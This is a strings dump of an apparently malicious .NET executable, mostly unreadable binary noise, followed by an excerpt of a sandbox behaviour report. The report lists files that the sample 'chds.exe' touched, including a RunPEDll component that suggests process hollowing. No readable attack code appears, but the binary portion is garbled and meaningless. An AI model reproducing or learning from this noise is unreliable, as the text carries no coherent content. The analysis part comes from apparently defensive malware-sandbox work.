v#44o
ZRjf
: xS
?8wh(
;|RD
a1~-x
.'Q`
DU #
4Vbmd
)wk"d\?
=$qr
8} C~
*635
]]\p
g, `
sEN=
Mzm5dLWQuaduP2FVS6upc7y7as1p4
K ?L
q?r[
];#,1dY
e@iZG
g1|W
#0Zs
J[tpY
P=YM&
p!51
Q %&
BWW!
bh`P
wy D
=4 F
K#ne-<
DaG=
xkj |X
D^x2
0^mk
2KzS
bY0y<
:Wuz
h_L
lC9`jr
/A.}
6<#G
%/Xe
d9*Q
/cmH ,L/
X ;
=`eV
*GLB
QD6
I+-yooxu
y}w=
G7<s
=$ C*
5,:Q
(s)a
T\y%s8
m<B!9l
Bjd!
BSJB
2!-xi
43ua
!4V
*e}-
]'{89
$9Hb
$+$4Nb
X]kp
J([Mo
e-OE
IMSx?
D_I
P[ <
f4sE
oTB}
^i&Z
,&-V
&e!@
LGh
~um45
x.vmE9
8?+7eN
CEev
5:hc
f(zk
-9V{#h
yC n
7gX%
| s0
+-3E
p{1Ju
4I's
nZ,KX
t_.J.~
7*=>d.
'Y? -W
c yk
SRMX+
|T[fs*
_ >mprk
Dwaj7=
*A!B
'92%
^LM}
1IzV
_h %
pd Y
pcj4Y
BYdr
=#q=
x(D-
{b'=
Rd-DR
get_Message
!This program cannot be run in DOS mode. $
2y;
>YN_
GeI1X
9}Uu
t|U
lJs7
y9@+IC!
alph
O4 ;
Do2h
/I)~
xrguf
*T!q
{ $$
ul#<k'.$?S
1qK
aEH G
d u~.
,X6o
foo"
\yGK
oxX 7+
G<Eh
A}#X
& >D
ly=u
>&b:
Fg~:
]a{Y@|C
E-72
P]m/!
>RPHw
#S$}
I{5Js
[;W
{c:M
_PTE"/
J$pq
$LpXg
M8gY
ce=78
f} [
2=/z
fgoN
_G^-)
^~K E`RZ
#~jeB
eda.-
G#Q_
1`yq3
R,:_
P.d[PU
N6{B
{tSn?
5[7Q;DiKCPb
}k;v"
,3[Cw
M4fC
sTp)Z5&
bA>])
<vY%p
#6wd
$^9,
`uc=V4>
.t!0
_0*l"
@z
a\y z
rlaC
Y[wz
oC;'`
<3T)
#GUID
]FO@
5p '
DyOG
}@f
`cr
CG(4
tmz
&Xve
3L a
3M *
r zN
'}d0
2eN@
D2e q
5g-!X4
@jHrp
d= w
6^R{
J;-"uzZ
2q$8
i],]JK
):on#
43EVz
GATj
/R;u'"[J
"??A
ID{j
4*qS
nn4 _
b;;$
KZe]
\} s
:Hb
pwn}
q7o #C
Tg1K
XOah
b%#r
{TC6
YeH{
cTE)
;Uw)
=4?/"
X{ ?.
|f m
q6JUb
9MvB
+Q|vx
Udz;+E
A%mL
?])N
a^Vt
4#`uv
@Adg
al;Q
69sf$oW
-hO\
vc/q
E+ G
GcQ6b
)YV?
xb P
kIs8
$Tx6kqYxBPAhsCoRPc0KyrBV6TPxftN3Q6PrZ
_Mnl
-t'{2
. R
jNv0w#
<>S"
;3m c
G8Blz[sakyO#u`6B
E~ Y
'oIVjH99R39iED24aAy6rMY1mtCctTLOE2nOlOmb
q%ih@
^<~)
k2x,
*;3"
5wmn
Fg i,
:#=h
~*</?
-K* ].@
$vEG
_%4=|.\
X*0
u~'(
Li Md
p>z9
<?; ~
$'mR
G&2\g
N't?
1x%_
Th%2
"uxy
35Xv"
KBf+
>)r&
HHEii7R>
rQEdu
BEj/iz
c,'E-F
fmUM
HfdL
aXZr
>m30
uo9(
p=Hq
=fH,
+hgqo
wLW^
g'ocX
, U[
$~r:p@
)YDE
p,|j*
K>PH
EbN2
p"/_
a8?
uB,
vcWC
{jrQ
t@Kd
2e\c+
;,*L
A){%2&
1Xd&{
"u1Z
W.%)
Li9}x
-4,R
K c5G
dcQ|
qaeP
9_fG.
O9Z%
,H7+
>QID
zTc:
[3J`s
+bu
;l5@
#(NG
_2Ma
$L ipNa
hO^r$
N_N]
pt@+
qkz
\F:2xX
f7MJ
Bg2D
(DK
b_!YhE
=%H
arkq
U)`\
L1 &
:e4>
Gu@e
=^B]
6@9Q
_12P 5iL
q1&W#9
g[>Wq
KWz{GCC
N#O(
;JWX*
FPo8Y
:}-W'
:~BB7lu
uW`x#
U^ ;A
BD K7
Y~xWW
T|]
K`+r>
Xs&$]
/|L-` ElVY\
kFoQ{
=3$T
* 3%>
c"<I-
L cS
c8xH
b3 3x
[:-(
g@$@bBi
oa $n
tm2?d
uJh7
Y;>W8
&) ^[
V?Z9
uc57b
wl0n6
UDNF
prpF
d4!)
HBaB
RgSi
)1dd
=k|$
l;Xm
#W70
%by0
1x>,dZ
,: S
]6LZj4v
m^)!K
Qno0
_kO<
W`C~
2&WP*
#Kw53fMo
}.?<
91gN
! N
J` K
! 4n
7W6>3
u< P
S"tE
nb.6
jFMe(W
:O <
ofeCe5
|r&
;@BL
IXxYp
BwIu
(}02
./<8
VeqO
hn6P
C;I"
YLTKW
Ocqw
];Ja
J z
pn{S
!CKR
ur%k
GE0T
Y]LpN}
,]4g
>.gVA
FZh=
+yT
3p:+
bvGKa
Rk#w
K @
SCO4
sk`R
=8Q-CU
99 B?
@if
k)Q$d
3O86
wf$A
3+xNJ
@=wC
( u
FGEoP5HDd0UqAYZjc2yiEu1dRA5dLfL
1]>tJ
0U|X
O;_?kr
}0#~
>@2g
J_ Uz
3UbTEY
?rwV
YoJZ
51q)-
H0jS
A"Qp
M+W
qj^6n
Hy=9KF
'/<{
NwJ
+OOHK
d peb
B:.:
K;F(
R{K5
p %d
^wS2
%|E0
+ze'U
)')q
aJA.
,5vn
S% _QG
J3g2Ps
%`lO
Kiu <
Hq=WA
4)g Gi
)Pua?
H}^X
yfxIh
;`&h
?+ n4r
ljEr
k *~
n` U?
D6!I
Y Qzh
] J+
m8`w
JnLl`{
tiZ]
y!=D
=0O
HpFU
c[t/3
rGMQ
`lO5
ZLta
(PjG
'^nq
8'Ba
{76k
$,.J
zCga
\0ED
7Oal
L\jn
~$moQ
s}+
~TG:!
/]J{)
Te,"
7eiu5
'VZA
l saP
WHOx=JQ
~+R.DK
]iTk
SpjJA0
c58\
9jzhg
$uL<
?j:"w
r# Hs
2 &U
@- U
!3[2
<{Kmb
{j;BqH '
?/&J
/Ypcte
fa)@
w-ama
V<Y+
N#TH
t<wOS
ret
UQ~
^B}W
gPg
:fxQ(f
zch;
R|87Y
#K&()
g~`I
c,JP
8FG>
P561
&w%DYs
e[gV
<Xq>
U>;Ln
ZQ*I
;#cqE
%<ZJ
gO'3
Mt!>
-TT0
n< p
-/(I
[t#, KHq
#zxek
1]F@
BF<2
AV*2!
~f K
Kd>R
8AbN
cwnz?
O!eo
aKOj
b )F-
jyp<mG
K*3|
Bo?F
S#jY
}c\w
d7l$
0c2]
}nfZ
>8od
?)vD
d\>T
Ly @
PwVm
3"j(
Q0|b7O$M.
G JZ
,jTi-q
J %a
U(]4
{l$$
Xb [
yw-S mQ
g+oy'mb'm
MFM1J
@3zOH
#yLq
qY\A
k.m"
nD^
U1vt
qHu$
l@L
Y0NA
xisA
`*PDX
\[xa
/\['
{8uZ
+khw
v75*}
6c?W
G 5V
vFK^7X
jy9j
VmT k
hagn
y"SuC
,3ru%
WF,C
*:Z4
2\'ny
orF@
""l{lHC
bI}+
re*7
|`np
0Lv!
1]kGhn
B{Ki
LbbQ4^ES
a"hN
gsGo|
Bp&FQ
CompilationRelaxationsAttribute
6_N#
<U}S
2l*X
_j+z
"Q6~>
178.
]Mqn
N`#_
*ycy L
'~9R
(}h>Vny
2W"k
G $c
sDDX
;H6u
I$[wm
G7&l
#)-i
7{%>
<BM
4 ${
esN{
~pY"
7<3UF
](M4Us
<q#
E`lIC
I:So
}SC7
@)oB?
DT?f@\
= uV
eE;H
EGx!
y, t~
N/*R
*&Ci
Gcf%s
u`cDQ
9M6;p
waxDT
-8P]X
{V7 b-W9S
^aI8T
yBdpK5
n~!F"
%uEz
*,2c.
IBVu
uF?Cp
Show
=3+
^Y .
D>y9
B*((
x {oD
z~k#
fHxk*
~6y,
n0R
RZYP
z,J%
ART=;
Yz~K
r7AZs
It!"Xp?
xpTu5
qIre
NVfd
xqooRO
*?[Ft
16+<H
&p 0(
F??h
d'8n
Y+1U
8@rA
String
9hzBkiMoGFqbkwxHk4YOkzb8o6
W%x}
_CorExeMain
:R9Q
@w'=4g
l# J
T/ a
a9h`A
XnNE
RqjO
rE*c
* ?{
3}&f
( &
ll -
_{+8_
+ `
-qhE
`wdTH
Dbj4s
PikClDZLHhKW85mLQoMm44oT
j&;R
%sj,
W0;<
X gT6
tnl=
g3PZ
m?VE
Wv>8~
X>hTD
zs#x
%7iF
nyoD
)Z^M3j
dxJC
bXt V
GzBx
*a \
X]eg
r+C <
Hq*
h[B4
2aV7# W
m=,q
p\6G
N](tJ
kf..
3E^3,~F
NpNz
}Jj,
skC
pMbMw
;t5m
,VlP?11
?c =
K~HA<
_ L=
L(]MsK
22mH
&_FW
.`zY
c WJzV
e[`d
6SvZ/C
8_*p
%4hWpQlr62wO2ekR07x75GYOiICpPmmZSy2Wm8
C,(O
;<zV
U]>$a
9.']
%yqt
Dv-h
:T&MrF
f%%$!
cjqC(
!+7d
Q)L_
=q6~s9
tY$}
Dd}iD
M]J|q2
TdGR
JOD\
k =:
GetTypeFromHandle
2|yP
F6pT
!EyNA
59 0P
/;/s
xh`(QL
=w<S
fIq
C*<B
B\>lh
Ll]m
4J[Bn'U 8
2tyN%
/vB}~{D
[l$X
'o6cL
FhYJ
L9yG
6U)M
e jQ|t
_u)X
2-94
omkQ
VOtK
~@+"
{;b
N3 9
e [~ =
5k`e
A'`y
[2n
w^%0
t\, h
$FG 3
]BxB
!yHX
N7*"
L~T^
ds{Kr
WG=o
|RfH
vwTg
rI^$ {
i'=6
~bW<
?vx)
Z9QG~
!bcc
"T0$mP|
_?FV
Z1y&
+ ]~+
/YZ#@
]$X3
6`j9
dY>O+!GK
abRI
9BiM
1qs>
c`QQ
Lmd5
G;{Y
>T H
97>*
Lh>~C
ele2SpPbTTSaPziyVVJIq
?'<]
"E{,
n.`=5
E^L
U=3=
)7yq^>|[)
utF4
Q aq
^ 'l
M`o/h
^2ps
~4q:/fs
Y8jQJ _
Ihrr
RB Lok
Aja
R{a=
U CU
1WemO0exyVfmLpDHjYGoQ7qz
>e:O#
L35^
/T1_ie
5s1U
e0EC
=%Rx
+sk0
EJ[l
]P`u
x{7Sx
xcCAt
4k/
@?']S
wK>D
e6ag
x1k;bG}
. ;
M.! H
6p T
/diW
@Nc7
SCl+
NH*K
rBm)f
<~C=
J=Ds
[xG Ra
o<|{
q }'L
G; 0
^~Q
n }G
wR)2yJ
R7Z) =
iwQ,W
S#,+
pSEa<
J.Ds
<`Ds
fO_s
p)&[
zphA
Zgi<
]?z{
\ -Qg
P A,$,
A]yP'At
A Im
xA5O
M41g
lJ-5
*jx-
1f~6
/"Xa
8)oi
u :g
*bSC
5sGc
`tB[
e7 r
t*\w
DxK
ww!6
+W:_?
Z/ke\<
&M6X
MVbDU
<|{)?@"
/{exB
HPmp
oRU+e6
UeA,@
ZASy
g-Dh
jIjA
9IIE
xT(A
v#x'
rO`IN
1oh im
~eL!
LxBn
]Q'C
* Ib
:m&S
u,k}
)f4BZ
9@c}
{C]D
m j{A1
Bd]Q
(?GU
TZ%i
NSe[x
@yF3s
a.3!ZsV
~T.F
a H$
=dtR
6/
aIF.8L
BtU8
xIQ8\1
dU+=
f<7lq
:h e
Ul+xP
[;XL?
/~wccv7.
|_XzoS
"TL{P
Ece
_S@5)
=zhao
#"19
Va6:wR
5?c^
: 8.
j9ZM
}f u
:xbZ21t
<:VD
kW1$S
l-jn'E
4H+%
Gu{0
4$5t
:JTC
zIo};
=37g
eN*+P[9
/SA
hZ6ZZ0lkU44RBqhCFY03HdmHiOi4QUij
b V F
arpd
,Y 6
,":
- t?E
YM3Y
@.P5
jg[Ff
'ryB
*j&I
? |
Wq>
bA7E
%U0%p
zr7d
%f |?
2b6ACp
V oB' .o
m)v`
93l4ae
] >
%Z9c
4E/bB
AL`9
96{`,
'mEs
-*Afs)
Y/snt
/9.w'==<2oJ
+mx[
Q z}
E*{/
ksmZ
Ul.1
?e:`
Nek#
sFG\
P&0(
| !h
Tc\HN>
KG}n
i[ e
ZMDi
bHgN
_O0G
(}yt
jaf
D_VRN
){S%
/gi^
n PT
pOBR (A&y
7]X{'
+#}{er
}m|4
<.$h;
DWlX
IwUbi
!Q4L
sy#P
i[ J
"cz\k|fw
/1HE
0B O$
9t}P-
(xor
FP:AnVt
~Zv;
2Y#Q
.` e
\)kU
G7 G
.c0-)
:^J@
Nf+d
[=46Z
Awdo
mM *
iZ1*
~RhrY
L~GQ
s
AW'q
Zl;b
m v18
"*-
>z7
z. M
~f=Q
b9md
{Y5R
] & e
:~yi
qHgR
Tt*9s
US u_|
J%{:!
|FV{
?YH-
$ZeZ
V2]sj8 .
iqI
wqw7
[:b$j
|vip
qY9U
^Y+{q 3;d
| },>
T4 -?
[Gwt
Lj?xrP
y^P5=J]
VMm"
9dSV
jQ|qa%tM
KY,#
( !
(e A
ldU5
@2Jq
{-f:
|R~
T44t`
RA >.
ut_d
.s'_
ljIr
j~7!
V~TFu
_11Vk
SBN=
U3{\
H> 8
rRkv
'06 +
|n6A5
7O3 V
*P+6
jU$8
*ro1
NS}Q
nu_y
|oP
s^/4
1]!z
8''y
U<^$
AbEP
pY}F-~g
Te{~
bxq(
75gk0RbGw5XvHm4UnIPdwMnRokr7omD
>O}U,
=qRZ
>U2M
`v.YwS
p-lc
)F1/
mt"J
lT}2o_K
mN%_
,F{wN
QckY
LKSS
>"_sP(
6_~T9h
9;>
Z;J/
B;E\
_GE3
WcEX %l
~*@K
2%f
[~G~
V-P
f/{co
Co=z`
/NHwT?
y "
5K /
@5'4Se
4b,Q
eKB2
YU&\
rb]V?v
b eh
r MTv
qgbK
A-;!
^V-
0iU0nYg
Un`Ozy
8z Z
R}07
'v'~_N
[SK!
deAq<
@!<^K
3L]X_
>+(^
rRUB
GI5)
kF^5
8 V(
<6Js
$h G/
<ZISR
>0.)E
5+&vc^
TDd|
{ZXQ
g\L>
xJ;r
I3D+
aPAh
a-Ib&aWVoq
*5"e
TfR
8.>,
~k-rBE
\`*H
f 'F
\l/g3 g
:e9z
6ixw
<o~=
#(pQ
A1z{
#b'*
sU"<r
t"8|
)+\,@
; b(MY
q3c
@Lj\o
rX.KZ
zAK-o}
w,fp
28MC
r{bx
j)Z8
AlAw$
ddK3cdMoK5qitbyIbSohjm5PrfI
&kBMhxHzc7UmxyiamHvd3F48aQHPfxSDs6qCw4S
w*f
Mh|r|
6n^u
mJqi8ygpXgpFsdRlvNGMH
9nP<E
sk!O*_
mxP!
S '?
U0vi
I8>j
$@Ms
hX9b
S")1s
W_R!
B k(
/9WZD-
6ubD
wVB`#!
*~-Y&
lXcS
(N6VF
caO>s
x5%-
V$+N
3w N
PO=@
*LVA
VIV'
ep<
{FKD
(//7
7,ep
ObO-
fe ~
j:f)
;`Q<
8("u
`n1;#
"laI#KSB
xZ 'V
sK .
^_8t0
?[IV
:zqn96
Ex#?
@fc[
zP e
_l+\+
HjMf
Lu/6W
w)+\
5{1e
bng ,
~H\tA
BR'*O
d `1
If?!
]LK4
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PA
*zy[
"!;O
/j'
-G32G
C 8e
95J2
wYm M
qjSg .
rd#Gha
W^a\o
6t(5
) I\
%x[
2cTH#W
XON
Jp na
o> 9}o
>i29!
?4vi
+|Ye
-|x?D
MER3u
+L<!
ZE8:!
^.&R
`WMe+
w4sFk
X{ja
,e=c
=B"'J
iTs?
-a/;C
-E@U
mM }
LHa*
c )(
3iTA
X{i^$
ZD_J
4%d`@/!:D
s0Ug p
V.]
'6gJ
YCM&
!u;*
Un[/
D%wP
56C
elH q5
%"}c
Hb-+
2^P3
zrUv
v R()
L,xf
F~X&
(9$x
tffd
>:z2(
"zuTDyqkZW0BdqBWJfsJySHpRURZ6Pp0r2d
urZL
Qs6X
Y08`
f]pAFR*
2}'
< 6zc
Q?Lu
"e$I
U>4$&'
?mdV4
xR)k
1iDo
#6}s
0O7b
u >)
-q@x
)@fwH
La[f
8keqF
TdW}
k~7R<BW[/
B-xx
wad-
Np)(vk
MpXx
RTQ
S?%:
FV}y
+Yr[
K"687
arK,
JDEO
CmuH
7F'&
<'4{
%^69
zX[<
$be1
5I;5
]qH1
M $>
JOkn
7;ppM}{
Zf2?
RdQV
,K8S
;p+N
rmSt
(ihSh
((IC
SqMy8
8LQm
nD\h,
Zdgw
es:J<
tO!7
"O
*.K~
36dKR
Qdx|-
zf%9
u/^R
&j|V
I^V]O.
xtc1
dyovCg
o_LX0
Rm}?%c
QQC0
>dft
upHU
];M@
kyxT.%O
z]Z/
D% 6
-o>0
,@zO
qMLl
EPu$z
^jVz
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
vKDYY
LO*
{[k(
IJk|<Z
^3z
xK3^&8
[,
% &Wk
#d&E
rv4cnFY
=Jg0
U.T7
VsaytiNxzJsFBYS5UkUyVcTc
o"zh
O!/0 VM
)1)m
ql >
#qY"
6j0I
DGIa"4r
y0]G5
B-oT
]io'
00W|
>DiSa^
G;8 2
eaq_
Cj[0
o};)Y
^A/[
@wly
#v:V
krK5
$a+(#?
CbEg
y~k/h
(nmz
\r7~
[ACi
.@G2
vlzK
*sv x
X*
6P&Kp
I/J@
=#H9
$ $Y
O*F
4yti!
bKMxHe5jkLgWiKg1K9Gja
_RAz#qy
>J2kRk
tW+y<:7
7`_w;Q>
W=\.E
IW#H
?g0]m
*;0
E->$d
ZfiLi
l +\
G 87
w@O
Ky\BP
Gzh.WJv
Kzz0
.i|
nu^U
dlo -
ZBPc
ucR#J
PNTN
B`CS
Xol
In9f1OTkR8oaTd7cWlFKNSdjqoTu
Lr#m
%cB#=
+T+* l
I=O\<<
8D
+2>
^.U
g9d[C
f~iy
KYnBn
Aqmh
t}%
1 cNZ
Hl }
l];',Fu
}/W1
n `M
p|03
q w#
*r28w"
5DM
`9]7
T@u4
0@~4`
:5@RP
[I 2
0OyS
JYOv
hA=x
5_" 2&
Bac'l
=}W~
_r$7
ze0|
11G&@JiuP
:KkF
q=[
9n)70LF
XN.#
!^h
M!23
"[b"
Q|CND<q
h: >
TO~2
."xZ
G&)U4W
BD)Xj
t2fc
+ '\
%[w#
~a|k
b}~#
<BC'
pqM ;
HqLL
&%@$
FQnhk
sE!)
y q'
]bh[J
sar=
(,!{y
To)c
{C&.
<{^f
-Y y
%%Pl
j of) 6r
Ww?>N
K**_
,E +
'+A6z,
a9 Y
1(Eu5
U2 N
OU{m
{RwL
^&3H
0R^R
c^WW
ZoCG
6j4_)h
A_a<a
#w/QI|P
[9Z
"E}
"# w$
Zc7H~
H+0kA
XA7:
ypu
kv}0
(_v0
N CQ
q]q3
;mrR
|5:N
L Z[
(j;2h
cG3<
n2by&
~p?p
E*Q'
z)+q
jy{a
NU_<
*D^
9*7g#
|Ir(
C'd+
5if/
zFYO&
:02Q
^A=Y}
2'B,9"NT
2i"|5
"6A#
D7]7
8>?J
,M{^
M9Y6
[ EN
mXnw
MTP`
Rsu(
- p_o
%5C}N
gVI"
EJF3
JDVh
j+YIx
]XFH
#j|
.zx
|)-D
lPK6
7(IPF z
17nX
:u)C
Gkh.
Q$09
ZET!Jx
6%A 5
tgr:
u}@0
\dT#
7N L
ZqCS
;) c
~/?j
fsD
9(^Du
b/xu$"
UCX5
\^6
Xq#!g
]6='
E]dm
8+ 6
clhq
A+Q;e
+<K4
mscorlib
!bhm
TDSI!
pAf6
L.be
1fq
"X(d
a:~
BSEr
OJ_#
d~n
IOBe
9Km=
Ziu[
X*`v
#TKl.
qI6pk
3Pv+
khtXf
Lg9?
}e;K1
8c`v
F-SP9
~Led
W<IX
7e1,
>L-
p)\
.oq\
%lD&
8A"H
] ]
/,s:
P&e
DD3T
BCHC
SqC
uHDR
ctOai
P#ux
R^Niov
_%f2
PGcjw
O.Fk
(_[n
1=U&(l
pb'q
Aas(">
}H ?
>D7
W0>
GLg0
K &@
?+ Z
=:G=&
k"z3.
1=M}(@
sKb{KV
ra0#o
5(8S
b}J8i3
(HX_#
7X*WR;C0CSL
qTjz
_B9I
Ep1h
RR7D1
|bp)
rSRm$
~YR]s3
0Jt8
D4s6Us
E{CO
Y80eH
-?uK
Z:aB
:J.o_6
~u?5R
k|-F|
Yv^\
;?TX
CAjO n
dVnn
2L0@L
kP9;
:*_S
ro8Js
A;U67
~Cyk!
[R:M/K
+>~kV
WJMMgwmn28XfKPmM7m2Isnnsi2CW
tMUv]
_WG5
!VRX
$q4P
q\(4
@* `
+YP2m
T]VO>@
CANV3
LrOh
1{7Jdy
_i7C
UK!<
v6iA+
pKy)
q&!i
tVR{
!lmY
?=c9G=
R qw$
0#>^g
K%(N
# ?g
UoeR
?:;"
` EW
_-Hy
oC e
R|BK`
-g\o
S7oX}
dp]18q7l
m5@?G
|&;LD
j-Zl
;Gzma
AH4?
Tc@x7^
%=mou
Pc;u
8 t
a@W }
+PyU
j2Fr
e?J{
f;B~Y>JoT
{1Q$SL>
L<!k
k(Q11
Zu(U
V}V+
&*%#
=w:K
Ff40f
q k^Mp
a14
_ 4}
VRXzd
Q4 MF3
"D{#v
t i_u
4Vo$
r+)$R@
+lG
I-?
}4,
ij5H0
+DsL
i(o0
k /B
IWf5
B+8z
BB:}]
n#9K
+H'g
hx j
`xN bP
}`Hs
u:7]
o dD
k)yS
6GW:
1u\zM
bf|kt&
rPU
!}Ob"
.p {^
B G
1f$D
4&Z=z
j[!q8#
O?
` A
sfTR
^';N
pvdas'
$pr4
Qel}
@I%\R
^q'/cRy>*
w^sy
_ qj
`E'a
`u%U*
@<e
w);Y
S~.7
uti{m]2
*afs
9 @%
,zHZ)
R6}?
0J^?
HDz@
DT3z
-)['
!sg U
ql[c
b=TE
9 zs
DzrJP$
er]Q2
QPtO
E@_
)#q0
u8'R
) ^
b(Gf
8Wx}c?
(9v|
"B`H
qb8}g
bsL*
B`@|
nJEv
XGV
**zJ|
_)RGrG
EHk'*
B!RH
N*kd^n
]|2`
# Yn(
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2018-03-22 17:41:03 2018-03-22 17:43:53 170

10 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven01_64 Seven01_64 VirtualBox 2018-03-22 17:41:03 2018-03-22 17:43:53 170

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\chds.exe.config
C:\Users\Seven01\AppData\Local\Temp\chds.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\unrar\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Python27\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\chds.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index149.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\chds.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol21.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\08d608378aa405adc844f3cf36974b8c\Microsoft.VisualBasic.ni.dll
C:\Windows\assembly\GAC_MSIL\Microsoft.VisualBasic\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.INI
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\chds.resources\chds.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources\chds.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\chds.resources\chds.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
